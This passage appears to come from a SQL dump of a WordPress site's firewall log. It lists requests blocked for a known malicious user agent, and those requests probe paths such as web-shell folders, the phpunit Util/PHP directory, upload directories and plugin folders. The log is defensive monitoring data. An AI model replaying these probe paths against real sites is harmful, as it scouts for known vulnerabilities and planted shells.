User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2VkaXRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12247,1674879451.260548,1674879451.154800,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/files/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12248,1674879448.598287,1674879448.488300,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/home/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2hvbWUv\",\"category\":\"brute-force\",\"ssl\":1}'),(12249,1674879445.748121,1674879445.639000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload/image/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12250,1674879443.555636,1674879443.441700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12251,1674879439.542265,1674879439.434300,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/assets/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12252,1674879436.363460,1674879436.257000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/images/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12253,1674879433.119332,1674879433.014000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12254,1674879430.921341,1674879430.811700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/Admin/uploads/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12255,1674879428.275326,1674879428.151000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/uploads/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12256,1674879425.175116,1674879425.064000,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12257,1674879422.055836,1674879421.927100,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/uploads/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12258,1674879418.252788,1674879418.121500,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/acme-challenge/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12259,1674879416.049570,1674879415.936700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-knownold/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12260,1674879413.111526,1674879412.996600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12261,1674879410.559047,1674879410.429200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12262,1674879393.164262,1674879393.053400,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12263,1674879390.696994,1674879390.582300,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12264,1674879388.701544,1674879388.588300,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/classic/inc/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12265,1674879385.647257,1674879385.488200,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins-old/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(12266,1674883112.789556,1674883112.659700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/uploads/images/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMvaW1hZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12267,1674883108.740183,1674883108.597800,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/components/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12268,1674883105.189572,1674883105.062800,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMvbW9kX3NpbXBsZWZpbGV1cGxvYWR2MS4zL2VsZW1lbnRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12269,1674883100.527533,1674883100.396600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(12270,1674883095.790988,1674883095.663700,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(12271,1674883090.620405,1674883090.489600,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/images/slider/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2ltYWdlcy9zbGlkZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(12272,1674883086.069651,1674883085.907900,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/include/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luY2x1ZGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(12273,1674883081.266114,1674883081.125500,'\0\0\0\0\0\0\0\0\0\0��©�\Z',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/editor/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 